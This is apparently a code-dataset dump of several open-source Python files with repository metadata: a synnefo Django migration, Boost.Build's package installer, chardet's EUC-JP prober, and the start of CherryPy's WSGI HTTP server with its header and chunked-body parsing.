'nic': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'ips'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['db.NetworkInterface']"}),
'serial': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'ips'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['db.QuotaHolderSerial']"}),
'subnet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'ips'", 'to': "orm['db.Subnet']"}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'userid': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'})
},
'db.ipaddresslog': {
'Meta': {'object_name': 'IPAddressLog'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'address': ('django.db.models.fields.CharField', [], {'max_length': '64', 'db_index': 'True'}),
'allocated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'network_id': ('django.db.models.fields.IntegerField', [], {}),
'released_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'server_id': ('django.db.models.fields.IntegerField', [], {})
},
'db.ippooltable': {
'Meta': {'object_name': 'IPPoolTable'},
'available_map': ('django.db.models.fields.TextField', [], {'default': "''"}),
'base': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'offset': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'reserved_map': ('django.db.models.fields.TextField', [], {'default': "''"}),
'size': ('django.db.models.fields.IntegerField', [], {}),
'subnet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'ip_pools'", 'null': 'True', 'to': "orm['db.Subnet']"})
},
'db.macprefixpooltable': {
'Meta': {'object_name': 'MacPrefixPoolTable'},
'available_map': ('django.db.models.fields.TextField', [], {'default': "''"}),
'base': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'offset': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'reserved_map': ('django.db.models.fields.TextField', [], {'default': "''"}),
'size': ('django.db.models.fields.IntegerField', [], {})
},
'db.network': {
'Meta': {'object_name': 'Network'},
'action': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '32', 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'drained': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'external_router': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'flavor': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'floating_ip_pool': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'mac_prefix': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'machines': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['db.VirtualMachine']", 'through': "orm['db.NetworkInterface']", 'symmetrical': 'False'}),
'mode': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'serial': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'network'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['db.QuotaHolderSerial']"}),
'state': ('django.db.models.fields.CharField', [], {'default': "'PENDING'", 'max_length': '32'}),
'tags': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'userid': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'})
},
'db.networkinterface': {
'Meta': {'object_name': 'NetworkInterface'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'device_owner': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'firewall_profile': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'mac': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'machine': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'nics'", 'to': "orm['db.VirtualMachine']"}),
'name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '128', 'null': 'True'}),
'network': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'nics'", 'to': "orm['db.Network']"}),
'security_groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['db.SecurityGroup']", 'null': 'True', 'symmetrical': 'False'}),
'state': ('django.db.models.fields.CharField', [], {'default': "'ACTIVE'", 'max_length': '32'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'userid': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'})
},
'db.quotaholderserial': {
'Meta': {'ordering': "['serial']", 'object_name': 'QuotaHolderSerial'},
'accept': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'pending': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'resolved': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'serial': ('django.db.models.fields.BigIntegerField', [], {'primary_key': 'True', 'db_index': 'True'})
},
'db.securitygroup': {
'Meta': {'object_name': 'SecurityGroup'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'db.subnet': {
'Meta': {'object_name': 'Subnet'},
'cidr': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'dhcp': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'dns_nameservers': ('synnefo.db.fields.SeparatedValuesField', [], {'null': 'True'}),
'gateway': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'host_routes': ('synnefo.db.fields.SeparatedValuesField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ipversion': ('django.db.models.fields.IntegerField', [], {'default': '4'}),
'name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '128', 'null': 'True'}),
'network': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'subnets'", 'to': "orm['db.Network']"})
},
'db.virtualmachine': {
'Meta': {'object_name': 'VirtualMachine'},
'action': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '30', 'null': 'True'}),
'backend': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'virtual_machines'", 'null': 'True', 'on_delete': 'models.PROTECT', 'to': "orm['db.Backend']"}),
'backend_hash': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'backendjobid': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True'}),
'backendjobstatus': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'backendlogmsg': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'backendopcode': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'backendtime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(1, 1, 1, 0, 0)'}),
'buildpercentage': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'flavor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['db.Flavor']", 'on_delete': 'models.PROTECT'}),
'hostid': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'imageid': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'operstate': ('django.db.models.fields.CharField', [], {'default': "'BUILD'", 'max_length': '30'}),
'serial': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'virtual_machine'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['db.QuotaHolderSerial']"}),
'suspended': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'task': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'task_job_id': ('django.db.models.fields.BigIntegerField', [], {'null': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'userid': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_index': 'True'})
},
'db.virtualmachinediagnostic': {
'Meta': {'ordering': "['-created']", 'object_name': 'VirtualMachineDiagnostic'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'machine': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'diagnostics'", 'to': "orm['db.VirtualMachine']"}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'source_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
'db.virtualmachinemetadata': {
'Meta': {'unique_together': "(('meta_key', 'vm'),)", 'object_name': 'VirtualMachineMetadata'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'meta_key': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'meta_value': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'vm': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'metadata'", 'to': "orm['db.VirtualMachine']"})
}
}
complete_apps = ['db'] | gpl-3.0 |
ycsoft/FatCat-Server | LIBS/boost_1_58_0/tools/build/src/tools/package.py | 9 | 6990 | # Status: ported
# Base revision: 64488
#
# Copyright (c) 2005, 2010 Vladimir Prus.
# Copyright 2006 Rene Rivera.
#
# Use, modification and distribution is subject to the Boost Software
# License Version 1.0. (See accompanying file LICENSE_1_0.txt or
# http://www.boost.org/LICENSE_1_0.txt)
# Provides mechanism for installing whole packages into a specific directory
# structure. This is opposed to the 'install' rule, that installs a number of
# targets to a single directory, and does not care about directory structure at
# all.
# Example usage:
#
# package.install boost : <properties>
# : <binaries>
# : <libraries>
# : <headers>
# ;
#
# This will install binaries, libraries and headers to the 'proper' location,
# given by command line options --prefix, --exec-prefix, --bindir, --libdir and
# --includedir.
#
# The rule is just a convenient wrapper, avoiding the need to define several
# 'install' targets.
#
# The only install-related feature is <install-source-root>. It will apply to
# headers only and if present, paths of headers relatively to source root will
# be retained after installing. If it is not specified, then "." is assumed, so
# relative paths in headers are always preserved.
import b2.build.feature as feature
import b2.build.property as property
import b2.util.option as option
import b2.tools.stage as stage
from b2.build.alias import alias
from b2.manager import get_manager
from b2.util import bjam_signature
from b2.util.utility import ungrist
import os
feature.feature("install-default-prefix", [], ["free", "incidental"])
@bjam_signature((["name", "package_name", "?"], ["requirements", "*"],
["binaries", "*"], ["libraries", "*"], ["headers", "*"]))
def install(name, package_name=None, requirements=[], binaries=[], libraries=[], headers=[]):
requirements = requirements[:]
binaries = binaries[:]
    libraries = libraries[:]
if not package_name:
package_name = name
if option.get("prefix"):
# If --prefix is explicitly specified on the command line,
        # then we need to wipe away any settings of libdir/includedir
        # that are specified via options in config files.
option.set("bindir", None)
option.set("libdir", None)
option.set("includedir", None)
# If <install-source-root> is not specified, all headers are installed to
# prefix/include, no matter what their relative path is. Sometimes that is
# what is needed.
install_source_root = property.select('install-source-root', requirements)
if install_source_root:
requirements = property.change(requirements, 'install-source-root', None)
install_header_subdir = property.select('install-header-subdir', requirements)
if install_header_subdir:
install_header_subdir = ungrist(install_header_subdir[0])
requirements = property.change(requirements, 'install-header-subdir', None)
# First, figure out all locations. Use the default if no prefix option
# given.
prefix = get_prefix(name, requirements)
# Architecture dependent files.
exec_locate = option.get("exec-prefix", prefix)
# Binaries.
bin_locate = option.get("bindir", os.path.join(prefix, "bin"))
# Object code libraries.
lib_locate = option.get("libdir", os.path.join(prefix, "lib"))
# Source header files.
include_locate = option.get("includedir", os.path.join(prefix, "include"))
stage.install(name + "-bin", binaries, requirements + ["<location>" + bin_locate])
alias(name + "-lib", [name + "-lib-shared", name + "-lib-static"])
# Since the install location of shared libraries differs on universe
# and cygwin, use target alternatives to make different targets.
    # We should have used indirect conditional requirements, but it's
# awkward to pass bin-locate and lib-locate from there to another rule.
alias(name + "-lib-shared", [name + "-lib-shared-universe"])
alias(name + "-lib-shared", [name + "-lib-shared-cygwin"], ["<target-os>cygwin"])
# For shared libraries, we install both explicitly specified one and the
# shared libraries that the installed executables depend on.
stage.install(name + "-lib-shared-universe", binaries + libraries,
requirements + ["<location>" + lib_locate, "<install-dependencies>on",
"<install-type>SHARED_LIB"])
stage.install(name + "-lib-shared-cygwin", binaries + libraries,
requirements + ["<location>" + bin_locate, "<install-dependencies>on",
"<install-type>SHARED_LIB"])
# For static libraries, we do not care about executable dependencies, since
# static libraries are already incorporated into them.
stage.install(name + "-lib-static", libraries, requirements +
["<location>" + lib_locate, "<install-dependencies>on", "<install-type>STATIC_LIB"])
stage.install(name + "-headers", headers, requirements \
+ ["<location>" + os.path.join(include_locate, s) for s in install_header_subdir]
+ install_source_root)
alias(name, [name + "-bin", name + "-lib", name + "-headers"])
pt = get_manager().projects().current()
for subname in ["bin", "lib", "headers", "lib-shared", "lib-static", "lib-shared-universe", "lib-shared-cygwin"]:
pt.mark_targets_as_explicit([name + "-" + subname])
@bjam_signature((["target_name"], ["package_name"], ["data", "*"], ["requirements", "*"]))
def install_data(target_name, package_name, data, requirements):
if not package_name:
package_name = target_name
if option.get("prefix"):
# If --prefix is explicitly specified on the command line,
        # then we need to wipe away any settings of datarootdir
option.set("datarootdir", None)
prefix = get_prefix(package_name, requirements)
datadir = option.get("datarootdir", os.path.join(prefix, "share"))
stage.install(target_name, data,
requirements + ["<location>" + os.path.join(datadir, package_name)])
get_manager().projects().current().mark_targets_as_explicit([target_name])
def get_prefix(package_name, requirements):
specified = property.select("install-default-prefix", requirements)
if specified:
specified = ungrist(specified[0])
prefix = option.get("prefix", specified)
requirements = property.change(requirements, "install-default-prefix", None)
# Or some likely defaults if neither is given.
if not prefix:
if os.name == "nt":
prefix = "C:\\" + package_name
elif os.name == "posix":
prefix = "/usr/local"
return prefix
| mit |
heeraj123/oh-mainline | vendor/packages/requests/requests/packages/chardet/eucjpprober.py | 2919 | 3678 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import EUCJPDistributionAnalysis
from .jpcntx import EUCJPContextAnalysis
from .mbcssm import EUCJPSMModel
class EUCJPProber(MultiByteCharSetProber):
def __init__(self):
MultiByteCharSetProber.__init__(self)
self._mCodingSM = CodingStateMachine(EUCJPSMModel)
self._mDistributionAnalyzer = EUCJPDistributionAnalysis()
self._mContextAnalyzer = EUCJPContextAnalysis()
self.reset()
def reset(self):
MultiByteCharSetProber.reset(self)
self._mContextAnalyzer.reset()
def get_charset_name(self):
return "EUC-JP"
def feed(self, aBuf):
aLen = len(aBuf)
for i in range(0, aLen):
# PY3K: aBuf is a byte array, so aBuf[i] is an int, not a byte
codingState = self._mCodingSM.next_state(aBuf[i])
if codingState == constants.eError:
if constants._debug:
sys.stderr.write(self.get_charset_name()
+ ' prober hit error at byte ' + str(i)
+ '\n')
self._mState = constants.eNotMe
break
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == constants.eStart:
charLen = self._mCodingSM.get_current_charlen()
if i == 0:
self._mLastChar[1] = aBuf[0]
self._mContextAnalyzer.feed(self._mLastChar, charLen)
self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
else:
self._mContextAnalyzer.feed(aBuf[i - 1:i + 1], charLen)
self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
charLen)
self._mLastChar[0] = aBuf[aLen - 1]
if self.get_state() == constants.eDetecting:
if (self._mContextAnalyzer.got_enough_data() and
(self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
contxtCf = self._mContextAnalyzer.get_confidence()
distribCf = self._mDistributionAnalyzer.get_confidence()
return max(contxtCf, distribCf)
| agpl-3.0 |
commshare/testLiveSRS | trunk/objs/CherryPy-3.2.4/build/lib.linux-armv7l-2.7/cherrypy/wsgiserver/wsgiserver2.py | 19 | 87973 | """A high-speed, production ready, thread pooled, generic HTTP server.
Simplest example on how to use this module directly
(without using CherryPy's application machinery)::
from cherrypy import wsgiserver
def my_crazy_app(environ, start_response):
status = '200 OK'
response_headers = [('Content-type','text/plain')]
start_response(status, response_headers)
return ['Hello world!']
server = wsgiserver.CherryPyWSGIServer(
('0.0.0.0', 8070), my_crazy_app,
server_name='www.cherrypy.example')
server.start()
The CherryPy WSGI server can serve as many WSGI applications
as you want in one instance by using a WSGIPathInfoDispatcher::
d = WSGIPathInfoDispatcher({'/': my_crazy_app, '/blog': my_blog_app})
server = wsgiserver.CherryPyWSGIServer(('0.0.0.0', 80), d)
Want SSL support? Just set server.ssl_adapter to an SSLAdapter instance.
This won't call the CherryPy engine (application side) at all, only the
HTTP server, which is independent from the rest of CherryPy. Don't
let the name "CherryPyWSGIServer" throw you; the name merely reflects
its origin, not its coupling.
For those of you wanting to understand internals of this module, here's the
basic call flow. The server's listening thread runs a very tight loop,
sticking incoming connections onto a Queue::
server = CherryPyWSGIServer(...)
server.start()
while True:
tick()
# This blocks until a request comes in:
child = socket.accept()
conn = HTTPConnection(child, ...)
server.requests.put(conn)
Worker threads are kept in a pool and poll the Queue, popping off and then
handling each connection in turn. Each connection can consist of an arbitrary
number of requests and their responses, so we run a nested loop::
while True:
conn = server.requests.get()
conn.communicate()
-> while True:
req = HTTPRequest(...)
req.parse_request()
-> # Read the Request-Line, e.g. "GET /page HTTP/1.1"
req.rfile.readline()
read_headers(req.rfile, req.inheaders)
req.respond()
-> response = app(...)
try:
for chunk in response:
if chunk:
req.write(chunk)
finally:
if hasattr(response, "close"):
response.close()
if req.close_connection:
return
"""
__all__ = ['HTTPRequest', 'HTTPConnection', 'HTTPServer',
'SizeCheckWrapper', 'KnownLengthRFile', 'ChunkedRFile',
'CP_fileobject',
'MaxSizeExceeded', 'NoSSLError', 'FatalSSLAlert',
'WorkerThread', 'ThreadPool', 'SSLAdapter',
'CherryPyWSGIServer',
'Gateway', 'WSGIGateway', 'WSGIGateway_10', 'WSGIGateway_u0',
'WSGIPathInfoDispatcher', 'get_ssl_adapter_class']
import os
try:
import queue
except:
import Queue as queue
import re
import rfc822
import socket
import sys
if 'win' in sys.platform and not hasattr(socket, 'IPPROTO_IPV6'):
socket.IPPROTO_IPV6 = 41
try:
import cStringIO as StringIO
except ImportError:
import StringIO
DEFAULT_BUFFER_SIZE = -1
_fileobject_uses_str_type = isinstance(socket._fileobject(None)._rbuf, basestring)
import threading
import time
import traceback
def format_exc(limit=None):
"""Like print_exc() but return a string. Backport for Python 2.3."""
try:
etype, value, tb = sys.exc_info()
return ''.join(traceback.format_exception(etype, value, tb, limit))
finally:
etype = value = tb = None
import operator
from urllib import unquote
import warnings
if sys.version_info >= (3, 0):
bytestr = bytes
unicodestr = str
basestring = (bytes, str)
def ntob(n, encoding='ISO-8859-1'):
"""Return the given native string as a byte string in the given encoding."""
# In Python 3, the native string type is unicode
return n.encode(encoding)
else:
bytestr = str
unicodestr = unicode
basestring = basestring
def ntob(n, encoding='ISO-8859-1'):
"""Return the given native string as a byte string in the given encoding."""
# In Python 2, the native string type is bytes. Assume it's already
# in the given encoding, which for ISO-8859-1 is almost always what
# was intended.
return n
LF = ntob('\n')
CRLF = ntob('\r\n')
TAB = ntob('\t')
SPACE = ntob(' ')
COLON = ntob(':')
SEMICOLON = ntob(';')
EMPTY = ntob('')
NUMBER_SIGN = ntob('#')
QUESTION_MARK = ntob('?')
ASTERISK = ntob('*')
FORWARD_SLASH = ntob('/')
quoted_slash = re.compile(ntob("(?i)%2F"))
import errno
def plat_specific_errors(*errnames):
"""Return error numbers for all errors in errnames on this platform.
The 'errno' module contains different global constants depending on
the specific platform (OS). This function will return the list of
numeric values for a given list of potential names.
"""
errno_names = dir(errno)
nums = [getattr(errno, k) for k in errnames if k in errno_names]
# de-dupe the list
return list(dict.fromkeys(nums).keys())
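# Illustrative call (an assumed example, not part of the original module): on a
# POSIX platform the WSA* names do not exist in the errno module, so this
# typically yields only the EINTR number.
#
#     plat_specific_errors("EINTR", "WSAEINTR")   # e.g. [4] on Linux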
socket_error_eintr = plat_specific_errors("EINTR", "WSAEINTR")
socket_errors_to_ignore = plat_specific_errors(
"EPIPE",
"EBADF", "WSAEBADF",
"ENOTSOCK", "WSAENOTSOCK",
"ETIMEDOUT", "WSAETIMEDOUT",
"ECONNREFUSED", "WSAECONNREFUSED",
"ECONNRESET", "WSAECONNRESET",
"ECONNABORTED", "WSAECONNABORTED",
"ENETRESET", "WSAENETRESET",
"EHOSTDOWN", "EHOSTUNREACH",
)
socket_errors_to_ignore.append("timed out")
socket_errors_to_ignore.append("The read operation timed out")
socket_errors_nonblocking = plat_specific_errors(
'EAGAIN', 'EWOULDBLOCK', 'WSAEWOULDBLOCK')
comma_separated_headers = [ntob(h) for h in
['Accept', 'Accept-Charset', 'Accept-Encoding',
'Accept-Language', 'Accept-Ranges', 'Allow', 'Cache-Control',
'Connection', 'Content-Encoding', 'Content-Language', 'Expect',
'If-Match', 'If-None-Match', 'Pragma', 'Proxy-Authenticate', 'TE',
'Trailer', 'Transfer-Encoding', 'Upgrade', 'Vary', 'Via', 'Warning',
'WWW-Authenticate']]
import logging
if not hasattr(logging, 'statistics'): logging.statistics = {}
def read_headers(rfile, hdict=None):
"""Read headers from the given stream into the given header dict.
If hdict is None, a new header dict is created. Returns the populated
header dict.
Headers which are repeated are folded together using a comma if their
specification so dictates.
This function raises ValueError when the read bytes violate the HTTP spec.
You should probably return "400 Bad Request" if this happens.
"""
if hdict is None:
hdict = {}
while True:
line = rfile.readline()
if not line:
# No more data--illegal end of headers
raise ValueError("Illegal end of headers.")
if line == CRLF:
# Normal end of headers
break
if not line.endswith(CRLF):
raise ValueError("HTTP requires CRLF terminators")
if line[0] in (SPACE, TAB):
# It's a continuation line.
v = line.strip()
else:
try:
k, v = line.split(COLON, 1)
except ValueError:
raise ValueError("Illegal header line.")
# TODO: what about TE and WWW-Authenticate?
k = k.strip().title()
v = v.strip()
hname = k
if k in comma_separated_headers:
existing = hdict.get(hname)
if existing:
v = ", ".join((existing, v))
hdict[hname] = v
return hdict
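# A minimal sketch of read_headers() usage; the StringIO import and the sample
# header bytes below are assumptions made purely for illustration:
#
#     from StringIO import StringIO
#     rfile = StringIO("Host: example.com\r\nAccept: text/plain\r\n\r\n")
#     read_headers(rfile)
#     # -> {'Host': 'example.com', 'Accept': 'text/plain'}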
class MaxSizeExceeded(Exception):
pass
class SizeCheckWrapper(object):
"""Wraps a file-like object, raising MaxSizeExceeded if too large."""
def __init__(self, rfile, maxlen):
self.rfile = rfile
self.maxlen = maxlen
self.bytes_read = 0
def _check_length(self):
if self.maxlen and self.bytes_read > self.maxlen:
raise MaxSizeExceeded()
def read(self, size=None):
data = self.rfile.read(size)
self.bytes_read += len(data)
self._check_length()
return data
def readline(self, size=None):
if size is not None:
data = self.rfile.readline(size)
self.bytes_read += len(data)
self._check_length()
return data
# User didn't specify a size ...
# We read the line in chunks to make sure it's not a 100MB line !
res = []
while True:
data = self.rfile.readline(256)
self.bytes_read += len(data)
self._check_length()
res.append(data)
# See http://www.cherrypy.org/ticket/421
if len(data) < 256 or data[-1:] == "\n":
return EMPTY.join(res)
def readlines(self, sizehint=0):
# Shamelessly stolen from StringIO
total = 0
lines = []
line = self.readline()
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline()
return lines
def close(self):
self.rfile.close()
def __iter__(self):
return self
def __next__(self):
data = next(self.rfile)
self.bytes_read += len(data)
self._check_length()
return data
def next(self):
data = self.rfile.next()
self.bytes_read += len(data)
self._check_length()
return data
class KnownLengthRFile(object):
"""Wraps a file-like object, returning an empty string when exhausted."""
def __init__(self, rfile, content_length):
self.rfile = rfile
self.remaining = content_length
def read(self, size=None):
if self.remaining == 0:
return ''
if size is None:
size = self.remaining
else:
size = min(size, self.remaining)
data = self.rfile.read(size)
self.remaining -= len(data)
return data
def readline(self, size=None):
if self.remaining == 0:
return ''
if size is None:
size = self.remaining
else:
size = min(size, self.remaining)
data = self.rfile.readline(size)
self.remaining -= len(data)
return data
def readlines(self, sizehint=0):
# Shamelessly stolen from StringIO
total = 0
lines = []
line = self.readline(sizehint)
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline(sizehint)
return lines
def close(self):
self.rfile.close()
def __iter__(self):
return self
def __next__(self):
data = next(self.rfile)
self.remaining -= len(data)
return data
class ChunkedRFile(object):
"""Wraps a file-like object, returning an empty string when exhausted.
This class is intended to provide a conforming wsgi.input value for
request entities that have been encoded with the 'chunked' transfer
encoding.
"""
def __init__(self, rfile, maxlen, bufsize=8192):
self.rfile = rfile
self.maxlen = maxlen
self.bytes_read = 0
self.buffer = EMPTY
self.bufsize = bufsize
self.closed = False
def _fetch(self):
if self.closed:
return
line = self.rfile.readline()
self.bytes_read += len(line)
if self.maxlen and self.bytes_read > self.maxlen:
raise MaxSizeExceeded("Request Entity Too Large", self.maxlen)
line = line.strip().split(SEMICOLON, 1)
try:
chunk_size = line.pop(0)
chunk_size = int(chunk_size, 16)
except ValueError:
raise ValueError("Bad chunked transfer size: " + repr(chunk_size))
if chunk_size <= 0:
self.closed = True
return
## if line: chunk_extension = line[0]
if self.maxlen and self.bytes_read + chunk_size > self.maxlen:
raise IOError("Request Entity Too Large")
chunk = self.rfile.read(chunk_size)
self.bytes_read += len(chunk)
self.buffer += chunk
crlf = self.rfile.read(2)
if crlf != CRLF:
raise ValueError(
"Bad chunked transfer coding (expected '\\r\\n', "
"got " + repr(crlf) + ")")
def read(self, size=None):
data = EMPTY
while True:
if size and len(data) >= size:
return data
if not self.buffer:
self._fetch()
if not self.buffer:
# EOF
return data
if size:
remaining = size - len(data)
data += self.buffer[:remaining]
self.buffer = self.buffer[remaining:]
else:
data += self.buffer
    def readline(self, size=None):
        data = EMPTY
        while True:
            if size and len(data) >= size:
                return data
            if not self.buffer:
                self._fetch()
                if not self.buffer:
                    # EOF
                    return data
            newline_pos = self.buffer.find(LF)
            if newline_pos == -1:
                # No newline in the buffer yet; consume what we have (up to
                # 'size' bytes, if a size was given) and keep reading.
                if size:
                    remaining = size - len(data)
                    data += self.buffer[:remaining]
                    self.buffer = self.buffer[remaining:]
                else:
                    data += self.buffer
                    self.buffer = EMPTY
            else:
                # Return the completed line, including its LF terminator
                # (truncated to 'size' bytes if a size was given).
                line_end = newline_pos + 1
                if size:
                    line_end = min(line_end, size - len(data))
                data += self.buffer[:line_end]
                self.buffer = self.buffer[line_end:]
                return data
def readlines(self, sizehint=0):
# Shamelessly stolen from StringIO
total = 0
lines = []
line = self.readline(sizehint)
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline(sizehint)
return lines
def read_trailer_lines(self):
if not self.closed:
raise ValueError(
"Cannot read trailers until the request body has been read.")
while True:
line = self.rfile.readline()
if not line:
# No more data--illegal end of headers
raise ValueError("Illegal end of headers.")
self.bytes_read += len(line)
if self.maxlen and self.bytes_read > self.maxlen:
raise IOError("Request Entity Too Large")
if line == CRLF:
# Normal end of headers
break
if not line.endswith(CRLF):
raise ValueError("HTTP requires CRLF terminators")
yield line
def close(self):
self.rfile.close()
    def __iter__(self):
        # Yield each line of the chunked body in turn. (The original loop
        # referenced an undefined 'sizehint' name, which raised NameError.)
        line = self.readline()
        while line:
            yield line
            line = self.readline()
class HTTPRequest(object):
"""An HTTP Request (and response).
A single HTTP connection may consist of multiple request/response pairs.
"""
server = None
"""The HTTPServer object which is receiving this request."""
conn = None
"""The HTTPConnection object on which this request connected."""
inheaders = {}
"""A dict of request headers."""
outheaders = []
"""A list of header tuples to write in the response."""
ready = False
"""When True, the request has been parsed and is ready to begin generating
the response. When False, signals the calling Connection that the response
